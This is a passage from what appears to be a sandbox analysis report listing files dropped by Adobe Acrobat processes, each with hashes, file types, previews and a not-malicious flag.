                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.955941029595462
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sqP3ksBdOg2HIAcaq3QYiubInP7E4T3y:Y2sRdsY5dMHIr3QYhbG7nby
                                                                                  MD5:40878123F5394A9D80EC5E79148D2606
                                                                                  SHA1:C79EA67A8B0DDCEFD3F89D16C3070784BC2957C7
                                                                                  SHA-256:0B21AC46B36C3A6C4FECECBD40F1B7F9954C69E41899AE300AF2871E6E088497
                                                                                  SHA-512:A463DDEBECB052B8A569DD8EA964CE02AACE121028C97D2406C1D11DE682A6E836C8C573295B4A9545751E10FD9721173069D4E1FFB4038B94563EC5E4496730
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381466293425681","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121016},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4730
                                                                                  Entropy (8bit):5.254431146827415
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7DVHCf6HZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goN
                                                                                  MD5:256BC23C9F21EC986BBED173826B5288
                                                                                  SHA1:3C33B0D5FB002AA6C573B3E349EC80640D33A91F
                                                                                  SHA-256:13FE1EC14A484F81F0514B472C0390694A71885752731F6210AB159650E897A1
                                                                                  SHA-512:484A3612E1D83BEADDCA5A4FA083B9EAFDC4E31686A0AFE69A20BB6DD013558A9F1A1E4F6BE83032969A2DA94A9DFAA9237C768ED2DCCE7B377EEEBCDB1E258E
                                                                                  Malicious:false
                                                                                  Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):324
                                                                                  Entropy (8bit):5.180542573042661
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO89nd+q2Pwkn2nKuAl9OmbzNMxIFUtW9n5yWZmwo9nTiVkwOwkn2nKuAl9OmbzE:7Snd+vYfHAa8jFUtwn5yW/enWV5JfHAo
                                                                                  MD5:E6AADFB932B039620CA55E0EC37069DD
                                                                                  SHA1:C296EF6961F55D48A6BFCEE54D9B56B7CF52B3C9
                                                                                  SHA-256:1342F9900CAA769726DDF0E397BBF3F9686DDE872FAF1E6D5A10EA0D3E1C532F
                                                                                  SHA-512:A26D7A27EA882C4E101BACE8BBBBEF6C51B5B3FCA9EB46EDB95B4A91825AD76AE372A92B30351935ECE1424448DC80CE60D3216A1B8246E45A3FC519ECC6C296
                                                                                  Malicious:false
                                                                                  Preview:2025/01/14-20:58:01.145 1f3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-20:58:01.147 1f3c Recovering log #3.2025/01/14-20:58:01.148 1f3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):324
                                                                                  Entropy (8bit):5.180542573042661
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iO89nd+q2Pwkn2nKuAl9OmbzNMxIFUtW9n5yWZmwo9nTiVkwOwkn2nKuAl9OmbzE:7Snd+vYfHAa8jFUtwn5yW/enWV5JfHAo
                                                                                  MD5:E6AADFB932B039620CA55E0EC37069DD
                                                                                  SHA1:C296EF6961F55D48A6BFCEE54D9B56B7CF52B3C9
                                                                                  SHA-256:1342F9900CAA769726DDF0E397BBF3F9686DDE872FAF1E6D5A10EA0D3E1C532F
                                                                                  SHA-512:A26D7A27EA882C4E101BACE8BBBBEF6C51B5B3FCA9EB46EDB95B4A91825AD76AE372A92B30351935ECE1424448DC80CE60D3216A1B8246E45A3FC519ECC6C296
                                                                                  Malicious:false
                                                                                  Preview:2025/01/14-20:58:01.145 1f3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-20:58:01.147 1f3c Recovering log #3.2025/01/14-20:58:01.148 1f3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                  Category:dropped
                                                                                  Size (bytes):71190
                                                                                  Entropy (8bit):2.226922105754519
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:mwwgUgUgKgcgDgWgogOgyggg4g4g4g4gmgmgNgngTgUgSgVgG0DgFgtg5g4g4g4o:NMtQ/wMnQ4MYnG
                                                                                  MD5:E024F270F5A0C54CCCE869AE3B253BA4
                                                                                  SHA1:36F1E7EF3EE0AFD1559C4BD4DB41B07DCC626DB7
                                                                                  SHA-256:D9734E81EE834F47BA0972DCD0F41125F82AE07DD78A2DE70607EBC93136C0D7
                                                                                  SHA-512:E4424F161E6D62AC758871EF4C5D61355B1D17C2CB961265A849CEF642ADBA2A04AA894748D182A7505519316B54E33FA7034D377F4A804ACCB213040AD05B8F
                                                                                  Malicious:false
                                                                                  Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                  Category:dropped
                                                                                  Size (bytes):86016
                                                                                  Entropy (8bit):4.445000763575166
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:yezci5tIiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rvs3OazzU89UTTgUL
                                                                                  MD5:D42BCE5A3DE69D7836E8D39E2E5E94BE
                                                                                  SHA1:768D24EA83B5A1F8C849859F8D19A839C452040C
                                                                                  SHA-256:50714252C8F1E15CA719835CE0D3578AEB764AEFF22A57658CA46B49BF739B5E
                                                                                  SHA-512:417184C2B0C676DDE6E949EC4E7F844D8D03A4F7B1497C07544E937E1211081B1906A300F9EBD761AF97F77D85D0881597CD7D04DF9A21E9D640A88756B80989
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):3.7757364397313347
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MSp/E2ioyVoZioy9oWoy1Cwoy1piKOioy1noy1AYoy1Wioy1hioybioyz2oy1nE:7JpjuoZF6KXKQs0kb9IVXEBodRBkZd
                                                                                  MD5:F125E0C31B498849859034D72D5490F7
                                                                                  SHA1:DB2CC8B7A86BE1C9A9B7A8C4463A766088D65AD9
                                                                                  SHA-256:02ECA30FB2E143474DB83FEDC0A9C999B69F05F55B44D2A81FE39F561A0214A8
                                                                                  SHA-512:C22365FF934E6E52A3BB7B8DC2632E4B8C370303BFDDC59EF4C0A3926613F0306828AF04A3D2A32040BA57A07979A0DC78D820DA015AE5E3ABAF246F3FECEECB
                                                                                  Malicious:false
                                                                                  Preview:.... .c......\.d...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Certificate, Version=3
                                                                                  Category:dropped
                                                                                  Size (bytes):1391
                                                                                  Entropy (8bit):7.705940075877404
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                  Malicious:false
                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):192
                                                                                  Entropy (8bit):2.746484906506307
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFklGzs+M1fllXlE/HT8k51NNX8RolJuRdxLlGB9lQRYwpDdt:kKf7M2T8K7NMa8RdWBwRd
                                                                                  MD5:3B2577ACFB361B248F4C35134167C299
                                                                                  SHA1:993AF530F8CDD891962C6171F8BDD6BC7AC0B017
                                                                                  SHA-256:33F7E163499A087E06619D6D119FEBA5C8E3DF41892A63C145B4911E38820D0F
                                                                                  SHA-512:DA7FFFE485AECD3B1242D1AA562A7536D4B9AD396DA16AADD7AAC82429FB28CBE8664636E7D0CBED949DBA7C1E9E18F3971B4E80562FF929E65BAB7CAC9F404D
                                                                                  Malicious:false
                                                                                  Preview:p...... .............f..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.2478978672539016
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKRgUD+k99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:O1dDImsLNkPlE99SNxAhUe/3
                                                                                  MD5:0E1A5D57B8D89F957D3F14032EA33741
                                                                                  SHA1:CB876C84F2899FCEF8AA14A1C78B7FABCA9D34CF
                                                                                  SHA-256:9229C886FF27141E0256199A96DCB4A0FA39D03DC829F8B2F6693545943FAA49
                                                                                  SHA-512:059EED606BDCB10FD00D527F493BE6C531498864DBE03DEDCB91994A1FCBDE04C9D3936CE373E1DF5A27488FE9D34C58320A22A0BE4A88B57658CB5A6C1FE1C9
                                                                                  Malicious:false
                                                                                  Preview:p...... .............f..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):185099
                                                                                  Entropy (8bit):5.182478651346149
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):10880
                                                                                  Entropy (8bit):5.214360287289079
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):10880
                                                                                  Entropy (8bit):5.214360287289079
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):243196
                                                                                  Entropy (8bit):3.3450692389394283
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                                                  MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                                                  SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                                                  SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                                                  SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                                                  Malicious:false
                                                                                  Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.344047895501916
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJM3g98kUwPeUkwRe9:YvXKXFbHHkZc0v35GMbLUkee9
                                                                                  MD5:76911BF5B0EEE2E882112D1EC5A64925
                                                                                  SHA1:84B564220B07491B422D2D15B3BEFB7C2ED2D982
                                                                                  SHA-256:56A4E5F01A79601FFBD522CBAAC0B6EB6204E318AB1BA795EF243D49F85AB624
                                                                                  SHA-512:EB70C5C54EC91D507D9B487599CCBC024DAB4FC73CD0818C7093E8B26D05857B38A360E531F1FC6C44D35F28E75E402A7FC3C3BE80F67D3CB99D130FAA032C57
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.291813882865358
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfBoTfXpnrPeUkwRe9:YvXKXFbHHkZc0v35GWTfXcUkee9
                                                                                  MD5:B6DA10F3EDBECEAA305E3E3BA332414D
                                                                                  SHA1:131BF0FD8D3236586C40F1AEE56AEC2F80FE2C85
                                                                                  SHA-256:5FB8116D52FA36A54497C254C76DE4DF3B7054013D924B40A4684A11DD12C103
                                                                                  SHA-512:D997DD670B63B0BC8849BCA58FC24EEB60DC2983043A4B29AAAFC63067D1B29424E90C60E66F07E94F1F0201841FE654F10EB54227A74B4FFFD394AEA9C8C720
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.270483945289582
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfBD2G6UpnrPeUkwRe9:YvXKXFbHHkZc0v35GR22cUkee9
                                                                                  MD5:E85869227A16C39289711E0108AB92F0
                                                                                  SHA1:81C51E38C7DEF4046C3624580659398D498CA962
                                                                                  SHA-256:471EE5441AF168ECC470D7C68610E2C0D31118C98DFD4FABF923F5FD2F64C5EB
                                                                                  SHA-512:818EB6B5D668AE90AA302B6BC745586AEBF60C2941D5392D7621841A361DEBDEC029201630140B2E0692BA8A768BF8605FFA8B6BCD268EC55B2F3945B70E6CFF
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):285
                                                                                  Entropy (8bit):5.330380665177241
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfPmwrPeUkwRe9:YvXKXFbHHkZc0v35GH56Ukee9
                                                                                  MD5:63F294D6BB5B4E379A9D99D9B630FD9A
                                                                                  SHA1:603ABE3E97014EBB1ECF60ED4975075434622052
                                                                                  SHA-256:11102842DF859B30D3D19490594E5422EFF866425580DDEDCC6316E1530B47BA
                                                                                  SHA-512:34AF3982DAE07ED3CF1AE19AF2F0B8C31E16CAF6D080C95C279CA113C7C3B9AD4B14B98B56DB2A5304A1D25249E6EA9BEFBADFDA01159F52344E5DCC77B2621B
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
